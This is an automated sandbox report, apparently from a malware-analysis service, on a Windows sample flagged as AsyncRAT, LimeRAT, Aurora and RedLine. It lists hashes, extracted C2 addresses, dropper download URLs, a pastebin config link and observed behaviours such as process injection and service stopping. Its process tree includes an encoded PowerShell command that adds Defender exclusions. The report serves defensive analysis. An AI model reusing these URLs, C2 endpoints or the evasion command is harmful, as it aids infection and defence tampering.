asyncrat | 6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee

Resubmissions

21-11-2023 02:40

231121-c57v5sbf69 10

21-11-2023 02:31

231121-cz55cscc61 10

Analysis

max time kernel
138s
max time network
142s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
21-11-2023 02:40

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
Size

18.0MB
MD5

ab572c3d1e6ecab24e20a1f858eb57a1
SHA1

76fcdcb011b4edf3f5178ab0e08033d89d628902
SHA256

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee
SHA512

7354a60e927ddbf44e47d7febb068b3792ade2a9dd96f6ea07d6bb036fff4eaaf19977649e9784c80ba61d3655598e0d82aed333b2cd9610aa35babfb9a7d7bf
SSDEEP

393216:ARFbqnGONtcDEo7nKhgqgLsqpbe9+MxAa+kiUTg5Dqw:ArU13o7ZLsAH5Sdw

Score

10^/10

asyncrat aurora limerat redline @miroskati new evasion infostealer rat stealer upx vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/898655642749915136/Cypher_Rat.exe

Extracted

Family

aurora

37.220.87.13:8081

Extracted

Family

limerat

Attributes

aes_key
123
antivm
true
c2_url
https://pastebin.com/raw/mchxnAbT
delay
80
download_payload
false
install
true
install_name
WindosCert.exe
main_folder
AppData
pin_spread
true
sub_folder
\
usb_spread
true

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

NEW

Mutex

ihouhh

Attributes

delay
80
install
true
install_file
UpdateChromeDay.exe
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/mchxnAbT

aes.plain

Extracted

Family

redline

185.215.113.69:15544

62.204.41.141:24758

45.15.157.131:36457

Attributes

auth_value
971353143dce4409844e1f4f0f5f7af8

Extracted

Family

redline

Botnet

@Miroskati

ofriaransim.shop:80

Attributes

auth_value
384ebbf9bd4d7e80bf3269909b298f87

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

reg.exe

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess 18 IoCs

Processes:

directxc.exepowershell.EXEupdater.exedialer.exe

description	pid	Process	procid_target
PID 2748 created 1324	2748	directxc.exe	21
PID 2748 created 1324	2748	directxc.exe	21
PID 2748 created 1324	2748	directxc.exe	21
PID 2748 created 1324	2748	directxc.exe	21
PID 2748 created 1324	2748	directxc.exe	21
PID 2748 created 1324	2748	directxc.exe	21
PID 1776 created 420	1776	powershell.EXE	3
PID 2384 created 1324	2384	updater.exe	21
PID 2384 created 1324	2384	updater.exe	21
PID 2384 created 1324	2384	updater.exe	21
PID 2384 created 1324	2384	updater.exe	21
PID 2384 created 1324	2384	updater.exe	21
PID 2384 created 1324	2384	updater.exe	21
PID 2828 created 1324	2828	dialer.exe	21
PID 2828 created 1324	2828	dialer.exe	21
PID 2828 created 1324	2828	dialer.exe	21
PID 2384 created 1324	2384	updater.exe	21
PID 2828 created 1324	2828	dialer.exe	21

Async RAT payload 5 IoCs

rat

Processes:

resource	yara_rule
behavioral1/files/0x0007000000015c67-61.dat	asyncrat
behavioral1/files/0x0007000000015c67-59.dat	asyncrat
behavioral1/files/0x0007000000015c67-55.dat	asyncrat
behavioral1/memory/2200-88-0x00000000010F0000-0x0000000001112000-memory.dmp	asyncrat
behavioral1/memory/2332-92-0x0000000002680000-0x00000000026C0000-memory.dmp	asyncrat

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	Process
19	2828	powershell.exe
20	2828	powershell.exe
23	1832	powershell.exe
24	1832	powershell.exe
27	1532	powershell.exe
28	1532	powershell.exe
34	1524	powershell.exe
35	1524	powershell.exe
49	1068	powershell.exe
50	1068	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

directxc.exeupdater.exe

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	directxc.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 11 IoCs

Processes:

ChromeUpdate.exedirectx.exedirectxc.exedirectxCrack.exedirectxMer.exedirectxERR.exedirectxUp.exedirectxw.exeCypher.exevsdir.exeupdater.exe

pid	Process
2792	ChromeUpdate.exe
2708	directx.exe
2748	directxc.exe
2580	directxCrack.exe
2200	directxMer.exe
2832	directxERR.exe
600	directxUp.exe
560	directxw.exe
1816	Cypher.exe
568	vsdir.exe
2384	updater.exe

Loads dropped DLL 17 IoCs

Processes:

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exetaskeng.exe

pid	Process
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
2284	taskeng.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x000c00000000e651-11.dat	upx
behavioral1/files/0x000c00000000e651-12.dat	upx
behavioral1/files/0x000c00000000e651-15.dat	upx
behavioral1/files/0x000c00000000e651-19.dat	upx
behavioral1/memory/2792-23-0x0000000001310000-0x0000000001694000-memory.dmp	upx
behavioral1/memory/2792-161-0x0000000001310000-0x0000000001694000-memory.dmp	upx
behavioral1/memory/2792-172-0x0000000001310000-0x0000000001694000-memory.dmp	upx

VMProtect packed file 8 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral1/memory/1576-5-0x0000000000400000-0x000000000273B000-memory.dmp	vmprotect
behavioral1/memory/1576-6-0x0000000000400000-0x000000000273B000-memory.dmp	vmprotect
behavioral1/files/0x000a000000015c8f-84.dat	vmprotect
behavioral1/files/0x000a000000015c8f-87.dat	vmprotect
behavioral1/memory/1576-134-0x0000000000400000-0x000000000273B000-memory.dmp	vmprotect
behavioral1/files/0x000a000000015c8f-129.dat	vmprotect
behavioral1/memory/560-183-0x0000000000400000-0x000000000132A000-memory.dmp	vmprotect
behavioral1/memory/560-251-0x0000000000400000-0x000000000132A000-memory.dmp	vmprotect

Drops file in System32 directory 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

directx.exedirectxERR.exedirectxUp.exevsdir.exedirectxc.exepowershell.EXEupdater.exe

description	pid	Process	procid_target
PID 2708 set thread context of 2084	2708	directx.exe	35
PID 2832 set thread context of 2016	2832	directxERR.exe	42
PID 600 set thread context of 2512	600	directxUp.exe	43
PID 568 set thread context of 2940	568	vsdir.exe	46
PID 2748 set thread context of 572	2748	directxc.exe	85
PID 1776 set thread context of 2648	1776	powershell.EXE	99
PID 2384 set thread context of 2828	2384	updater.exe	116
PID 2384 set thread context of 2888	2384	updater.exe	133

Drops file in Program Files directory 4 IoCs

Processes:

directxc.exeupdater.execmd.execmd.exe

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	directxc.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
1724	sc.exe
3064	sc.exe
2244	sc.exe
3052	sc.exe
2604	sc.exe
600	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

LimeRat 6 IoCs

LimeRat.

Processes:

resource	yara_rule
behavioral1/files/0x0033000000015569-36.dat	Backdoor_Win32_LimeRAT
behavioral1/files/0x0033000000015569-40.dat	Backdoor_Win32_LimeRAT
behavioral1/files/0x0033000000015569-38.dat	Backdoor_Win32_LimeRAT
behavioral1/files/0x0033000000015569-44.dat	Backdoor_Win32_LimeRAT
behavioral1/files/0x0033000000015569-45.dat	Backdoor_Win32_LimeRAT
behavioral1/memory/2580-95-0x0000000000E80000-0x0000000000E9E000-memory.dmp	Backdoor_Win32_LimeRAT

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid	Process
580	schtasks.exe
1256	schtasks.exe
1256	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
832	WMIC.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80b5ff3a241cda01	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exepowershell.exepowershell.exepowershell.exedirectxw.exedirectxc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.exedllhost.exeupdater.exepowershell.exepowershell.exepowershell.exedialer.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
2876	powershell.exe
2892	powershell.exe
2332	powershell.exe
560	directxw.exe
560	directxw.exe
2748	directxc.exe
2748	directxc.exe
2680	powershell.exe
2748	directxc.exe
2748	directxc.exe
2748	directxc.exe
2748	directxc.exe
2748	directxc.exe
2748	directxc.exe
560	directxw.exe
1496	powershell.exe
1300	powershell.exe
2828	powershell.exe
2748	directxc.exe
2748	directxc.exe
2748	directxc.exe
2748	directxc.exe
1160	powershell.exe
1832	powershell.exe
1776	powershell.EXE
2324	powershell.EXE
1532	powershell.exe
1524	powershell.exe
1776	powershell.EXE
2648	dllhost.exe
2648	dllhost.exe
2648	dllhost.exe
2648	dllhost.exe
2384	updater.exe
2384	updater.exe
824	powershell.exe
1068	powershell.exe
2384	updater.exe
2384	updater.exe
2384	updater.exe
2384	updater.exe
2384	updater.exe
2384	updater.exe
2572	powershell.exe
2384	updater.exe
2384	updater.exe
2384	updater.exe
2384	updater.exe
2828	dialer.exe
2828	dialer.exe
2172	powershell.exe
2332	powershell.exe
1588	powershell.exe
1208	powershell.exe
1288	powershell.exe
2828	dialer.exe
2828	dialer.exe
2148	powershell.exe
2828	dialer.exe
2828	dialer.exe
2360	powershell.exe
2384	updater.exe
2384	updater.exe

Suspicious use of AdjustPrivilegeToken 60 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.exedllhost.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeupdater.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedialer.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	2892	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeShutdownPrivilege	2804	powercfg.exe
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeShutdownPrivilege	824	powershell.exe
Token: SeShutdownPrivilege	1916	powercfg.exe
Token: SeShutdownPrivilege	2000	powercfg.exe
Token: SeDebugPrivilege	2828	powershell.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	1776	powershell.EXE
Token: SeDebugPrivilege	2324	powershell.EXE
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	1776	powershell.EXE
Token: SeDebugPrivilege	2648	dllhost.exe
Token: SeDebugPrivilege	824	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeShutdownPrivilege	2860	powercfg.exe
Token: SeShutdownPrivilege	1492	powercfg.exe
Token: SeShutdownPrivilege	1564	powercfg.exe
Token: SeShutdownPrivilege	2216	powercfg.exe
Token: SeDebugPrivilege	2384	updater.exe
Token: SeAssignPrimaryTokenPrivilege	832	WMIC.exe
Token: SeIncreaseQuotaPrivilege	832	WMIC.exe
Token: SeSecurityPrivilege	832	WMIC.exe
Token: SeTakeOwnershipPrivilege	832	WMIC.exe
Token: SeLoadDriverPrivilege	832	WMIC.exe
Token: SeSystemtimePrivilege	832	WMIC.exe
Token: SeBackupPrivilege	832	WMIC.exe
Token: SeRestorePrivilege	832	WMIC.exe
Token: SeShutdownPrivilege	832	WMIC.exe
Token: SeSystemEnvironmentPrivilege	832	WMIC.exe
Token: SeUndockPrivilege	832	WMIC.exe
Token: SeManageVolumePrivilege	832	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	832	WMIC.exe
Token: SeIncreaseQuotaPrivilege	832	WMIC.exe
Token: SeSecurityPrivilege	832	WMIC.exe
Token: SeTakeOwnershipPrivilege	832	WMIC.exe
Token: SeLoadDriverPrivilege	832	WMIC.exe
Token: SeSystemtimePrivilege	832	WMIC.exe
Token: SeBackupPrivilege	832	WMIC.exe
Token: SeRestorePrivilege	832	WMIC.exe
Token: SeShutdownPrivilege	832	WMIC.exe
Token: SeSystemEnvironmentPrivilege	832	WMIC.exe
Token: SeUndockPrivilege	832	WMIC.exe
Token: SeManageVolumePrivilege	832	WMIC.exe
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeLockMemoryPrivilege	2888	dialer.exe
Token: SeDebugPrivilege	1596	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exedirectx.exedirectxERR.exedirectxUp.exe

description	pid	Process	procid_target
PID 1576 wrote to memory of 2332	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	28
PID 1576 wrote to memory of 2332	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	28
PID 1576 wrote to memory of 2332	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	28
PID 1576 wrote to memory of 2332	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	28
PID 1576 wrote to memory of 2792	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	30
PID 1576 wrote to memory of 2792	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	30
PID 1576 wrote to memory of 2792	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	30
PID 1576 wrote to memory of 2792	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	30
PID 1576 wrote to memory of 2708	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	31
PID 1576 wrote to memory of 2708	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	31
PID 1576 wrote to memory of 2708	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	31
PID 1576 wrote to memory of 2708	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	31
PID 1576 wrote to memory of 2748	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	33
PID 1576 wrote to memory of 2748	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	33
PID 1576 wrote to memory of 2748	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	33
PID 1576 wrote to memory of 2748	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	33
PID 1576 wrote to memory of 2580	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	34
PID 1576 wrote to memory of 2580	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	34
PID 1576 wrote to memory of 2580	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	34
PID 1576 wrote to memory of 2580	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	34
PID 1576 wrote to memory of 2832	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	36
PID 1576 wrote to memory of 2832	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	36
PID 1576 wrote to memory of 2832	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	36
PID 1576 wrote to memory of 2832	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	36
PID 1576 wrote to memory of 2200	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	37
PID 1576 wrote to memory of 2200	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	37
PID 1576 wrote to memory of 2200	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	37
PID 1576 wrote to memory of 2200	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	37
PID 2708 wrote to memory of 2084	2708	directx.exe	35
PID 2708 wrote to memory of 2084	2708	directx.exe	35
PID 2708 wrote to memory of 2084	2708	directx.exe	35
PID 2708 wrote to memory of 2084	2708	directx.exe	35
PID 2708 wrote to memory of 2084	2708	directx.exe	35
PID 2708 wrote to memory of 2084	2708	directx.exe	35
PID 2708 wrote to memory of 2084	2708	directx.exe	35
PID 2708 wrote to memory of 2084	2708	directx.exe	35
PID 2708 wrote to memory of 2084	2708	directx.exe	35
PID 1576 wrote to memory of 600	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	38
PID 1576 wrote to memory of 600	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	38
PID 1576 wrote to memory of 600	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	38
PID 1576 wrote to memory of 600	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	38
PID 1576 wrote to memory of 560	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	41
PID 1576 wrote to memory of 560	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	41
PID 1576 wrote to memory of 560	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	41
PID 1576 wrote to memory of 560	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	41
PID 2832 wrote to memory of 2016	2832	directxERR.exe	42
PID 2832 wrote to memory of 2016	2832	directxERR.exe	42
PID 2832 wrote to memory of 2016	2832	directxERR.exe	42
PID 2832 wrote to memory of 2016	2832	directxERR.exe	42
PID 2832 wrote to memory of 2016	2832	directxERR.exe	42
PID 2832 wrote to memory of 2016	2832	directxERR.exe	42
PID 2832 wrote to memory of 2016	2832	directxERR.exe	42
PID 2832 wrote to memory of 2016	2832	directxERR.exe	42
PID 600 wrote to memory of 2512	600	directxUp.exe	43
PID 600 wrote to memory of 2512	600	directxUp.exe	43
PID 600 wrote to memory of 2512	600	directxUp.exe	43
PID 600 wrote to memory of 2512	600	directxUp.exe	43
PID 600 wrote to memory of 2512	600	directxUp.exe	43
PID 600 wrote to memory of 2512	600	directxUp.exe	43
PID 600 wrote to memory of 2512	600	directxUp.exe	43
PID 2832 wrote to memory of 2016	2832	directxERR.exe	42
PID 600 wrote to memory of 2512	600	directxUp.exe	43
PID 1576 wrote to memory of 568	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	53
PID 1576 wrote to memory of 568	1576	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	53

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:480

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e5085c28-ffcc-469d-ac0b-1ee4357377f6}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2648
- C:\Windows\system32\wlrmdr.exe
  -s -1 -f 2 -t You are about to be logged off -m Windows has encountered a critical problem and will restart automatically in one minute. Please save your work now. -a 3
  2⤵
  PID:1720

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1324
- C:\Users\Admin\AppData\Local\Temp\6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
  "C:\Users\Admin\AppData\Local\Temp\6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1576
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAcgBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAZwB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbgB5ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2332
- - C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe
    "C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe"
    3⤵
    - Executes dropped EXE
    PID:2792
- - C:\Users\Admin\AppData\Local\Temp\directx.exe
    "C:\Users\Admin\AppData\Local\Temp\directx.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2708
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:2084
- - C:\Users\Admin\AppData\Local\Temp\directxc.exe
    "C:\Users\Admin\AppData\Local\Temp\directxc.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2748
- - C:\Users\Admin\AppData\Local\Temp\directxCrack.exe
    "C:\Users\Admin\AppData\Local\Temp\directxCrack.exe"
    3⤵
    - Executes dropped EXE
    PID:2580
- - C:\Users\Admin\AppData\Local\Temp\directxERR.exe
    "C:\Users\Admin\AppData\Local\Temp\directxERR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2832
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:2016
- - C:\Users\Admin\AppData\Local\Temp\directxMer.exe
    "C:\Users\Admin\AppData\Local\Temp\directxMer.exe"
    3⤵
    - Executes dropped EXE
    PID:2200
- - C:\Users\Admin\AppData\Local\Temp\directxUp.exe
    "C:\Users\Admin\AppData\Local\Temp\directxUp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
